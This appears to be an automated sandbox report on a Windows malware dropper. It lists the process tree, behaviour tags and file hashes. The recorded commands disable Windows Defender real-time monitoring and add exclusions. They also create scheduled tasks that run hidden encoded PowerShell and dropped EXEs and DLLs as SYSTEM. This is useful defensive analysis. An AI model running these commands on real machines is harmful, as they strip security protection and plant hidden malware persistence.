- Suspicious use of WriteProcessMemory
-
C:\Windows\SysWOW64\forfiles.exe"C:\Windows\System32\forfiles.exe" /p c:\windows\system32 /m cmd.exe /c "cmd /C REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Extensions\" /f /v \"exe\" /t REG_SZ /d 0 /reg:32® ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Extensions\" /f /v \"exe\" /t REG_SZ /d 0 /reg:64&"4⤵
- Suspicious use of WriteProcessMemory
-
C:\Windows\SysWOW64\cmd.exe/C REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Extensions" /f /v "exe" /t REG_SZ /d 0 /reg:32® ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Extensions" /f /v "exe" /t REG_SZ /d 0 /reg:64&5⤵
- Suspicious use of WriteProcessMemory
-
\??\c:\windows\SysWOW64\reg.exeREG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Extensions" /f /v "exe" /t REG_SZ /d 0 /reg:326⤵
-
\??\c:\windows\SysWOW64\reg.exeREG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Extensions" /f /v "exe" /t REG_SZ /d 0 /reg:646⤵
-
C:\Windows\SysWOW64\forfiles.exe"C:\Windows\System32\forfiles.exe" /p c:\windows\system32 /m cmd.exe /c "cmd /C REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Spynet\" /f /v \"SpyNetReporting\" /t REG_DWORD /d 0 /reg:32® ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Spynet\" /f /v \"SpyNetReporting\" /t REG_DWORD /d 0 /reg:64&"4⤵
- Suspicious use of WriteProcessMemory
-
C:\Windows\SysWOW64\cmd.exe/C REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Spynet" /f /v "SpyNetReporting" /t REG_DWORD /d 0 /reg:32® ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Spynet" /f /v "SpyNetReporting" /t REG_DWORD /d 0 /reg:64&5⤵
- Suspicious use of WriteProcessMemory
-
\??\c:\windows\SysWOW64\reg.exeREG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Spynet" /f /v "SpyNetReporting" /t REG_DWORD /d 0 /reg:326⤵
-
\??\c:\windows\SysWOW64\reg.exeREG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Spynet" /f /v "SpyNetReporting" /t REG_DWORD /d 0 /reg:646⤵
-
C:\Windows\SysWOW64\schtasks.exeschtasks /CREATE /TN "gjkQBGasR" /SC once /ST 09:37:12 /F /RU "Admin" /TR "powershell -WindowStyle Hidden -EncodedCommand cwB0AGEAcgB0AC0AcAByAG8AYwBlAHMAcwAgAC0AVwBpAG4AZABvAHcAUwB0AHkAbABlACAASABpAGQAZABlAG4AIABnAHAAdQBwAGQAYQB0AGUALgBlAHgAZQAgAC8AZgBvAHIAYwBlAA=="4⤵
- Creates scheduled task(s)
-
C:\Windows\SysWOW64\schtasks.exeschtasks /run /I /tn "gjkQBGasR"4⤵
-
C:\Windows\SysWOW64\schtasks.exeschtasks /DELETE /F /TN "gjkQBGasR"4⤵
-
C:\Windows\SysWOW64\schtasks.exeschtasks /CREATE /TN "bCfEGNwGDQwhWneLvC" /SC once /ST 23:15:00 /RU "SYSTEM" /TR "\"C:\Users\Admin\AppData\Local\Temp\qOrnnoslxFEibVOnF\ChQsEQNyswpenHU\TWjAkEt.exe\" pb /site_id 525403 /S" /V1 /F4⤵
- Drops file in Windows directory
- Creates scheduled task(s)
-
C:\Windows\system32\taskeng.exetaskeng.exe {35D18047-4472-4FF2-A93E-EB29208C98AA} S-1-5-21-3845472200-3839195424-595303356-1000:ZERMMMDR\Admin:Interactive:[1]1⤵
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXEC:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE -WindowStyle Hidden -EncodedCommand cwB0AGEAcgB0AC0AcAByAG8AYwBlAHMAcwAgAC0AVwBpAG4AZABvAHcAUwB0AHkAbABlACAASABpAGQAZABlAG4AIABnAHAAdQBwAGQAYQB0AGUALgBlAHgAZQAgAC8AZgBvAHIAYwBlAA==2⤵
- Drops file in System32 directory
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
-
C:\Windows\system32\gpupdate.exe"C:\Windows\system32\gpupdate.exe" /force3⤵
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXEC:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE -WindowStyle Hidden -EncodedCommand cwB0AGEAcgB0AC0AcAByAG8AYwBlAHMAcwAgAC0AVwBpAG4AZABvAHcAUwB0AHkAbABlACAASABpAGQAZABlAG4AIABnAHAAdQBwAGQAYQB0AGUALgBlAHgAZQAgAC8AZgBvAHIAYwBlAA==2⤵
- Drops file in System32 directory
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
-
C:\Windows\system32\gpupdate.exe"C:\Windows\system32\gpupdate.exe" /force3⤵
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXEC:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE -WindowStyle Hidden -EncodedCommand cwB0AGEAcgB0AC0AcAByAG8AYwBlAHMAcwAgAC0AVwBpAG4AZABvAHcAUwB0AHkAbABlACAASABpAGQAZABlAG4AIABnAHAAdQBwAGQAYQB0AGUALgBlAHgAZQAgAC8AZgBvAHIAYwBlAA==2⤵
- Drops file in System32 directory
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
-
C:\Windows\system32\gpupdate.exe"C:\Windows\system32\gpupdate.exe" /force3⤵
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXEC:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE -WindowStyle Hidden -EncodedCommand cwB0AGEAcgB0AC0AcAByAG8AYwBlAHMAcwAgAC0AVwBpAG4AZABvAHcAUwB0AHkAbABlACAASABpAGQAZABlAG4AIABnAHAAdQBwAGQAYQB0AGUALgBlAHgAZQAgAC8AZgBvAHIAYwBlAA==2⤵
- Drops file in System32 directory
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
-
C:\Windows\system32\gpupdate.exe"C:\Windows\system32\gpupdate.exe" /force3⤵
-
C:\Windows\system32\gpscript.exegpscript.exe /RefreshSystemParam1⤵
-
C:\Windows\system32\taskeng.exetaskeng.exe {F5C39959-689E-4B0C-AF30-9C54EB0D2572} S-1-5-18:NT AUTHORITY\System:Service:1⤵
-
C:\Users\Admin\AppData\Local\Temp\qOrnnoslxFEibVOnF\ChQsEQNyswpenHU\TWjAkEt.exeC:\Users\Admin\AppData\Local\Temp\qOrnnoslxFEibVOnF\ChQsEQNyswpenHU\TWjAkEt.exe pb /site_id 525403 /S2⤵
- Executes dropped EXE
- Drops file in System32 directory
-
C:\Windows\SysWOW64\schtasks.exeschtasks /CREATE /TN "gAwAVXBKV" /SC once /ST 19:24:51 /F /RU "Admin" /TR "powershell -WindowStyle Hidden -EncodedCommand cwB0AGEAcgB0AC0AcAByAG8AYwBlAHMAcwAgAC0AVwBpAG4AZABvAHcAUwB0AHkAbABlACAASABpAGQAZABlAG4AIABnAHAAdQBwAGQAYQB0AGUALgBlAHgAZQAgAC8AZgBvAHIAYwBlAA=="3⤵
- Creates scheduled task(s)
-
C:\Windows\SysWOW64\schtasks.exeschtasks /run /I /tn "gAwAVXBKV"3⤵
-
C:\Windows\SysWOW64\schtasks.exeschtasks /DELETE /F /TN "gAwAVXBKV"3⤵
-
C:\Windows\SysWOW64\cmd.execmd /C REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Real-time Protection" /f /v "DisableRealtimeMonitoring" /t REG_DWORD /d 1 /reg:323⤵
-
C:\Windows\SysWOW64\reg.exeREG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Real-time Protection" /f /v "DisableRealtimeMonitoring" /t REG_DWORD /d 1 /reg:324⤵
- Modifies Windows Defender Real-time Protection settings
-
C:\Windows\SysWOW64\cmd.execmd /C REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Real-time Protection" /f /v "DisableRealtimeMonitoring" /t REG_DWORD /d 1 /reg:643⤵
-
C:\Windows\SysWOW64\reg.exeREG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Real-time Protection" /f /v "DisableRealtimeMonitoring" /t REG_DWORD /d 1 /reg:644⤵
- Modifies Windows Defender Real-time Protection settings
-
C:\Windows\SysWOW64\schtasks.exeschtasks /CREATE /TN "gISRYSwkV" /SC once /ST 18:26:49 /F /RU "Admin" /TR "powershell -WindowStyle Hidden -EncodedCommand cwB0AGEAcgB0AC0AcAByAG8AYwBlAHMAcwAgAC0AVwBpAG4AZABvAHcAUwB0AHkAbABlACAASABpAGQAZABlAG4AIABnAHAAdQBwAGQAYQB0AGUALgBlAHgAZQAgAC8AZgBvAHIAYwBlAA=="3⤵
- Creates scheduled task(s)
-
C:\Windows\SysWOW64\schtasks.exeschtasks /run /I /tn "gISRYSwkV"3⤵
-
C:\Windows\SysWOW64\schtasks.exeschtasks /DELETE /F /TN "gISRYSwkV"3⤵
-
C:\Windows\SysWOW64\cmd.execmd /C REG ADD "HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Windows\Temp\jUlWXsHGbnJNPdLP" /t REG_DWORD /d 0 /reg:323⤵
-
C:\Windows\SysWOW64\reg.exeREG ADD "HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Windows\Temp\jUlWXsHGbnJNPdLP" /t REG_DWORD /d 0 /reg:324⤵
- Windows security bypass
-
C:\Windows\SysWOW64\cmd.execmd /C REG ADD "HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Windows\Temp\jUlWXsHGbnJNPdLP" /t REG_DWORD /d 0 /reg:643⤵
-
C:\Windows\SysWOW64\reg.exeREG ADD "HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Windows\Temp\jUlWXsHGbnJNPdLP" /t REG_DWORD /d 0 /reg:644⤵
- Windows security bypass
-
C:\Windows\SysWOW64\cmd.execmd /C REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Windows\Temp\jUlWXsHGbnJNPdLP" /t REG_DWORD /d 0 /reg:323⤵
-
C:\Windows\SysWOW64\reg.exeREG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Windows\Temp\jUlWXsHGbnJNPdLP" /t REG_DWORD /d 0 /reg:324⤵
-
C:\Windows\SysWOW64\cmd.execmd /C REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Windows\Temp\jUlWXsHGbnJNPdLP" /t REG_DWORD /d 0 /reg:643⤵
-
C:\Windows\SysWOW64\reg.exeREG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Windows\Temp\jUlWXsHGbnJNPdLP" /t REG_DWORD /d 0 /reg:644⤵
-
C:\Windows\SysWOW64\cmd.execmd /C copy nul "C:\Windows\Temp\jUlWXsHGbnJNPdLP\klMksWmF\jRunghrZMgqLhFQn.wsf"3⤵
-
C:\Windows\SysWOW64\wscript.exewscript "C:\Windows\Temp\jUlWXsHGbnJNPdLP\klMksWmF\jRunghrZMgqLhFQn.wsf"3⤵
- Modifies data under HKEY_USERS
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\FpvksngNCKIjC" /t REG_DWORD /d 0 /reg:324⤵
- Windows security bypass
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\FpvksngNCKIjC" /t REG_DWORD /d 0 /reg:644⤵
- Windows security bypass
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\QqSrWmvdGtwU2" /t REG_DWORD /d 0 /reg:324⤵
- Windows security bypass
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\QqSrWmvdGtwU2" /t REG_DWORD /d 0 /reg:644⤵
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\RIuAFuLLU" /t REG_DWORD /d 0 /reg:324⤵
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\RIuAFuLLU" /t REG_DWORD /d 0 /reg:644⤵
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\cfvymemHCAUn" /t REG_DWORD /d 0 /reg:324⤵
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\cfvymemHCAUn" /t REG_DWORD /d 0 /reg:644⤵
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\fGfduYyRRUhwWrnEYNR" /t REG_DWORD /d 0 /reg:324⤵
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\fGfduYyRRUhwWrnEYNR" /t REG_DWORD /d 0 /reg:644⤵
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\ProgramData\BekoRFZthbLHeaVB" /t REG_DWORD /d 0 /reg:324⤵
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\ProgramData\BekoRFZthbLHeaVB" /t REG_DWORD /d 0 /reg:644⤵
- Windows security bypass
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Users\Admin\AppData\Local\Temp\qOrnnoslxFEibVOnF" /t REG_DWORD /d 0 /reg:324⤵
- Windows security bypass
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Users\Admin\AppData\Local\Temp\qOrnnoslxFEibVOnF" /t REG_DWORD /d 0 /reg:644⤵
- Windows security bypass
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Windows\Temp\jUlWXsHGbnJNPdLP" /t REG_DWORD /d 0 /reg:324⤵
- Windows security bypass
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Windows\Temp\jUlWXsHGbnJNPdLP" /t REG_DWORD /d 0 /reg:644⤵
- Windows security bypass
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\FpvksngNCKIjC" /t REG_DWORD /d 0 /reg:324⤵
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\FpvksngNCKIjC" /t REG_DWORD /d 0 /reg:644⤵
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\QqSrWmvdGtwU2" /t REG_DWORD /d 0 /reg:324⤵
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\QqSrWmvdGtwU2" /t REG_DWORD /d 0 /reg:644⤵
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\RIuAFuLLU" /t REG_DWORD /d 0 /reg:324⤵
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\RIuAFuLLU" /t REG_DWORD /d 0 /reg:644⤵
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\cfvymemHCAUn" /t REG_DWORD /d 0 /reg:324⤵
- Windows security bypass
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\cfvymemHCAUn" /t REG_DWORD /d 0 /reg:644⤵
- Windows security bypass
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\fGfduYyRRUhwWrnEYNR" /t REG_DWORD /d 0 /reg:324⤵
- Windows security bypass
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\fGfduYyRRUhwWrnEYNR" /t REG_DWORD /d 0 /reg:644⤵
- Windows security bypass
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\ProgramData\BekoRFZthbLHeaVB" /t REG_DWORD /d 0 /reg:324⤵
- Windows security bypass
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\ProgramData\BekoRFZthbLHeaVB" /t REG_DWORD /d 0 /reg:644⤵
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Users\Admin\AppData\Local\Temp\qOrnnoslxFEibVOnF" /t REG_DWORD /d 0 /reg:644⤵
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Users\Admin\AppData\Local\Temp\qOrnnoslxFEibVOnF" /t REG_DWORD /d 0 /reg:324⤵
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Windows\Temp\jUlWXsHGbnJNPdLP" /t REG_DWORD /d 0 /reg:324⤵
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Windows\Temp\jUlWXsHGbnJNPdLP" /t REG_DWORD /d 0 /reg:644⤵
-
C:\Windows\SysWOW64\schtasks.exeschtasks /CREATE /TN "gbOXiPgms" /SC once /ST 10:20:22 /F /RU "Admin" /TR "powershell -WindowStyle Hidden -EncodedCommand cwB0AGEAcgB0AC0AcAByAG8AYwBlAHMAcwAgAC0AVwBpAG4AZABvAHcAUwB0AHkAbABlACAASABpAGQAZABlAG4AIABnAHAAdQBwAGQAYQB0AGUALgBlAHgAZQAgAC8AZgBvAHIAYwBlAA=="3⤵
- Creates scheduled task(s)
-
C:\Windows\SysWOW64\schtasks.exeschtasks /run /I /tn "gbOXiPgms"3⤵
-
C:\Windows\SysWOW64\schtasks.exeschtasks /DELETE /F /TN "gbOXiPgms"3⤵
-
C:\Windows\SysWOW64\cmd.execmd /C REG DELETE "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Real-time Protection" /v "DisableRealtimeMonitoring" /f /reg:323⤵
-
C:\Windows\SysWOW64\reg.exeREG DELETE "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Real-time Protection" /v "DisableRealtimeMonitoring" /f /reg:324⤵
-
C:\Windows\SysWOW64\cmd.execmd /C REG DELETE "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Real-time Protection" /v "DisableRealtimeMonitoring" /f /reg:643⤵
-
C:\Windows\SysWOW64\reg.exeREG DELETE "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Real-time Protection" /v "DisableRealtimeMonitoring" /f /reg:644⤵
-
C:\Windows\SysWOW64\schtasks.exeschtasks /CREATE /TN "cfFFKgQyvKFYWQGgS" /SC once /ST 19:58:09 /RU "SYSTEM" /TR "\"C:\Windows\Temp\jUlWXsHGbnJNPdLP\oqHWkXuwqeQQHza\twWLSVy.exe\" lH /site_id 525403 /S" /V1 /F3⤵
- Drops file in Windows directory
- Creates scheduled task(s)
-
C:\Windows\SysWOW64\schtasks.exeschtasks /run /I /tn "cfFFKgQyvKFYWQGgS"3⤵
-
C:\Windows\Temp\jUlWXsHGbnJNPdLP\oqHWkXuwqeQQHza\twWLSVy.exeC:\Windows\Temp\jUlWXsHGbnJNPdLP\oqHWkXuwqeQQHza\twWLSVy.exe lH /site_id 525403 /S2⤵
- Checks computer location settings
- Executes dropped EXE
- Drops Chrome extension
- Drops file in System32 directory
- Drops file in Program Files directory
- Modifies data under HKEY_USERS
- Suspicious behavior: EnumeratesProcesses
-
C:\Windows\SysWOW64\schtasks.exeschtasks /DELETE /F /TN "bCfEGNwGDQwhWneLvC"3⤵
-
C:\Windows\SysWOW64\cmd.execmd /C REG DELETE "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Extensions" /v "exe" /f /reg:323⤵
-
C:\Windows\SysWOW64\reg.exeREG DELETE "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Extensions" /v "exe" /f /reg:324⤵
-
C:\Windows\SysWOW64\cmd.execmd /C REG DELETE "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Extensions" /v "exe" /f /reg:643⤵
-
C:\Windows\SysWOW64\reg.exeREG DELETE "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Extensions" /v "exe" /f /reg:644⤵
-
C:\Windows\SysWOW64\schtasks.exeschtasks /CREATE /TR "rundll32 \"C:\Program Files (x86)\RIuAFuLLU\bzKuSC.dll\",#1" /RU "SYSTEM" /SC ONLOGON /TN "qcUOvNLqmSmqpxF" /V1 /F3⤵
- Drops file in Windows directory
- Creates scheduled task(s)
-
C:\Windows\SysWOW64\schtasks.exeschtasks /CREATE /TN "qcUOvNLqmSmqpxF2" /F /xml "C:\Program Files (x86)\RIuAFuLLU\zvTOjjj.xml" /RU "SYSTEM"3⤵
- Creates scheduled task(s)
-
C:\Windows\SysWOW64\schtasks.exeschtasks /END /TN "qcUOvNLqmSmqpxF"3⤵
-
C:\Windows\SysWOW64\schtasks.exeschtasks /DELETE /F /TN "qcUOvNLqmSmqpxF"3⤵
-
C:\Windows\SysWOW64\schtasks.exeschtasks /CREATE /TN "nCtegvDAmjdVDw" /F /xml "C:\Program Files (x86)\QqSrWmvdGtwU2\jjOOKBz.xml" /RU "SYSTEM"3⤵
- Creates scheduled task(s)
-
C:\Windows\SysWOW64\schtasks.exeschtasks /CREATE /TN "VircTphmeRxIj2" /F /xml "C:\ProgramData\BekoRFZthbLHeaVB\yQxwrPX.xml" /RU "SYSTEM"3⤵
- Creates scheduled task(s)
-
C:\Windows\SysWOW64\schtasks.exeschtasks /CREATE /TN "BPTpyhbDHEioZHGkr2" /F /xml "C:\Program Files (x86)\fGfduYyRRUhwWrnEYNR\mKvNqep.xml" /RU "SYSTEM"3⤵
- Creates scheduled task(s)
-
C:\Windows\SysWOW64\schtasks.exeschtasks /CREATE /TN "aTjIGRcnJusWUoAznGe2" /F /xml "C:\Program Files (x86)\FpvksngNCKIjC\uctwdBY.xml" /RU "SYSTEM"3⤵
- Creates scheduled task(s)
-
C:\Windows\SysWOW64\schtasks.exeschtasks /CREATE /TN "vdoHbRZAyoFFuVbVu" /SC once /ST 19:58:31 /RU "SYSTEM" /TR "rundll32 \"C:\Windows\Temp\jUlWXsHGbnJNPdLP\BGqJMPII\SSVtENh.dll\",#1 /site_id 525403" /V1 /F3⤵
- Drops file in Windows directory
- Creates scheduled task(s)
-
C:\Windows\SysWOW64\schtasks.exeschtasks /run /I /tn "vdoHbRZAyoFFuVbVu"3⤵
-
C:\Windows\SysWOW64\cmd.execmd /C REG DELETE "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Spynet" /v "SpyNetReporting" /f /reg:323⤵
-
C:\Windows\SysWOW64\reg.exeREG DELETE "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Spynet" /v "SpyNetReporting" /f /reg:324⤵
-
C:\Windows\SysWOW64\cmd.execmd /C REG DELETE "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Spynet" /v "SpyNetReporting" /f /reg:643⤵
-
C:\Windows\SysWOW64\reg.exeREG DELETE "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Spynet" /v "SpyNetReporting" /f /reg:644⤵
-
C:\Windows\SysWOW64\schtasks.exeschtasks /DELETE /F /TN "cfFFKgQyvKFYWQGgS"3⤵
-
C:\Windows\system32\rundll32.EXEC:\Windows\system32\rundll32.EXE "C:\Windows\Temp\jUlWXsHGbnJNPdLP\BGqJMPII\SSVtENh.dll",#1 /site_id 5254032⤵
-
C:\Windows\SysWOW64\rundll32.exeC:\Windows\system32\rundll32.EXE "C:\Windows\Temp\jUlWXsHGbnJNPdLP\BGqJMPII\SSVtENh.dll",#1 /site_id 5254033⤵
- Blocklisted process makes network request
- Checks BIOS information in registry
- Loads dropped DLL
- Drops file in System32 directory
- Enumerates system info in registry
- Modifies data under HKEY_USERS
-
C:\Windows\SysWOW64\schtasks.exeschtasks /DELETE /F /TN "vdoHbRZAyoFFuVbVu"4⤵
-
C:\Windows\system32\gpscript.exegpscript.exe /RefreshSystemParam1⤵
-
C:\Windows\system32\gpscript.exegpscript.exe /RefreshSystemParam1⤵
-
C:\Windows\system32\conhost.exe\??\C:\Windows\system32\conhost.exe "-772318503-20201097832123649311-176107108320859442231582663093-16614955271040602820"1⤵
- Windows security bypass
-
C:\Windows\system32\conhost.exe\??\C:\Windows\system32\conhost.exe "-17112276981107577348-174050087717324368371999302583-616379219-1445376830653351254"1⤵
- Windows security bypass
-
C:\Windows\system32\gpscript.exegpscript.exe /RefreshSystemParam1⤵
Network
MITRE ATT&CK Matrix ATT&CK v6
Replay Monitor
Loading Replay Monitor...
Downloads
-
C:\Program Files (x86)\FpvksngNCKIjC\uctwdBY.xmlFilesize
2KB
MD51998e41e080f5b81bd51c23c05ce3fd0
SHA13b4463f493aba2403e4f25154c828bf3e935f5fa
SHA256750d755a53cdf82a277ceb173eb2f7eac704837cd83db606fbfd01c8d63ce921
SHA512f006b26c62f5b04530a3ebdf9bd3e6d13a3f918b46cd2d535b402adeb71844767356c4dd17461c27f3ea61f9739aba360011ee8a53975a679a2b290888b0d829
-
C:\Program Files (x86)\QqSrWmvdGtwU2\jjOOKBz.xmlFilesize
2KB
MD57ce2360fccf4ad843be7b42f94f3fa8e
SHA14254359e78c45b1deb39767059dcdaca51c31693
SHA25602aada44fbf41121890234dd0fef4f0f38f96417d9be7eed5da84fd267404f08
SHA5127d72b6c3da788ac360c073e9a2d59209993c46d14e320984583a7f8c4f62fc5b809614f15bbf4929db851414cc942609d77b4d832f92d76f3d948df4b672484f
-
C:\Program Files (x86)\RIuAFuLLU\zvTOjjj.xmlFilesize
2KB
MD5ed574cbe661dd4dbcc2a6330c964707b
SHA1c732ca0598638cf98bc9c49b920f7f9bd514a373
SHA256e110eb6b84c8070aeb1b7abcbc165af3824ffc37d6ad53d888ebd61145b73f90
SHA512d78439a1a4ebda9ea086d0c4b9adf5c9a6068ab4345eb710b6565ca6316089c75a393a1d6b98f5983220bd227a030584a60022d5061a0c105dc4166f2b7fd517
-
C:\Program Files (x86)\fGfduYyRRUhwWrnEYNR\mKvNqep.xmlFilesize
2KB
MD51685cc50e6cd9ade8b19c2c876a98da9
SHA180b8b3505330f9cf51b4b9af817ba12157c60547
